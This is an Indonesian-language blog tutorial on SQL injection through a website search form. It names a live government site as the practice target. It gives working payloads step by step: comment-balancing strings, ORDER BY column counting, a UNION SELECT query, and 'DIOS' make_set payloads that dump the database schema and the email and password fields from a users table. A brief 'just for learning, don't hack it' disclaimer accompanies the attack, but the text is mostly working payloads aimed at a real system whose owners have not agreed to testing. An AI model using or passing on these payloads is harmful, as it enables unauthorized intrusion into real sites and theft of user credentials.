Yoo wassap! Dah lama ga update nih wkwkkw sorry ya, oke disini gw bakal share tutorial Cara Sqli Injection Di Form Search Atau Pencarian
Oke pertama siapkan target, disini gw udah ada target ya bisa Kalian buat belajar, jangan di hack bro:'(
Live target: http://p3tki-jatim.go.id/portal/
Silahkan buka, link nya ingat! Buat pembelajaran ya wkkw saya juga baru belajar nih hehe, langsung saja kalian ketik ke pencarian
1. Mencari Vulnerability
Contoh saya mencari test results dari pencarian "test" tidak memunculkan pesan eror bisa kalian coba dengan live target di atas
Sekarang kita coba dengan text test--+ dan results dari pencarian nya pun sama tidak memunculkan pesan eror sqli bisa kalian cari eror dengan menambahkan ( ' ) , ( " ) dll
Kita coba gunakan Comment/Balancing Yang sering di gunakan seperti di bawah
1. --
2. --+
3. #
4. --+-
5. ;%00
kita coba ke form pencarian dengan mengetikkan test" dan hasilnya pun eror "You have an error in your SQL syntax blablabla"
2. Menentukan Jumlah Columns
Setelah selesai pada tahap pertama kita lanjut ke tahap 2 Yaitu menentukan Jumlah Columns yang ada di DB web ini, dengan melakukan order by Mulai dari 1 sampe menemukan angka eror
portal/search.php?s=test'' order by 1--+ Normal
portal/search.php?s=test'' order by 2--+ Normal
portal/search.php?s=test'' order by 11--+ EROR
3. Mencari Angka Ajaib - Union Select
Kita menggunakan union select dengan Balancing yang di gunakan
Di target saya menggunakan Balancing #
Jadi kita masukan di pencarian dengan mencari
test" union select 1,2,3,4,5,6,7,8,9,10#
Sesuaikan dengan jumlah Columns yang kalian dapat, lalu cari dan!1!1! Boom Angka Ajaib di web target muncul
4. Kita Coba Melakukan Dump
Bagaimana caranya? Kita hanya perlu mengganti angka ajaib yang muncul dengan Dios, angka ajaib nya apa? Yang tadi muncul yaitu 2,8 dan 4
Saya coba melakukan cek version, user, dan database
Dios: group_concat(version(),0x3a,user())
Masukan Dios di angka ajaib saya ambil nomor 2 dan muncul version, user dan DB web target
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Untunk dump user & password
make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,email,password,password)),@)
Bisa kalian sesuai kan dengan untuk dump user dan password nya.
Oke mungkin sampe sini saja ya gw cape nulisnya, bila ada yang kurang jelas, maapin hehe saya juga masih belajar, thank you dah mampir jangan lupa share
